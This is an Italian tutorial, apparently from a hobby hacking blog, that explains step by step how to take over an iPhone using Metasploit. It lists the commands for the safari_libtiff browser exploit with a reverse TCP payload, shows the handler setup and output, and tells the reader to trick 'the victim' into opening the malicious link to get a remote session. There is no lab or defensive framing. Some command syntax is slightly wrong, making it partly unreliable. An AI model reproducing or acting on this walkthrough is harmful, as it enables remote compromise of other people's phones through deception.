Come hackerare iPhone


"Hey, hai visto? Ho comprato un iPhone! Ora vediamo sti piratacci come fanno ad hackerarmi!"

Se il tuo amico ti ha detto questa frase, beh digli che è un caprone...

A parte gli scherzi, Apple non è affatto invulnerabile, lascia solo meno scelta all'utente di danneggiarsi da solo. Ora vedremo quindi come hackerare un iPhone.



REQUISITI:

 

 

  • Computer con un qualsiasi sistema operativo 
  • Ultima versione di Metasploit Framework che trovi qui:  METASPLOIT

1) Lanciare Metasploit

 

Prima di tutto assicuriamoci che il servizio postgresql, necessario per far funzionare metasploit, sia attivo digitando:

 

service postgresql start.

 

Ora avviamo Metasploit Framework scrivendo il comando: msfconsole, e controlliamo che il database sia attivo digitando: db_status e premendo invio


2) Avviare l'exploit

 

Ora non dovremo fare altro che impostare l'exploit e il payload da usare. Quindi digitiamo:

 

set exploit/apple_ios/browser/safari_libtiff/

set PAYLOAD osx/armle/execute/reverse_tcp


3) Mettiamoci in ascolto

 

Impostiamo i dati per poter attaccare il telefono. Quindi inseriamo i seguenti comandi:

# set URIPATH /ipwn

# set LHOST [il tuo indirizzo ip]

# set LPORT [la porta di connessione, di solito si usa 4444]

# run

 



4) Ancora pochi passi

 

Ora avremo davanti a noi queste righe:

 

Started reverse handler
Using URL: 0.0.0.0:8080/ipwn
Local IP: xxx.xxx.xx.x:8080/ipwn
Server started.
* Exploit running as background job.
msf exploit(safari_libtiff) >

 

Quindi copiamo il link che segue Using URL e facciamo in modo che la vittima lo apra.

Ora verrà aperta una nuova sessione dalla quale potremo utilizzare in remoto l'iPhone


5) Fatto!

 

Ci credi? Hai hackerato un iPhone! Non vantartene troppo però ;)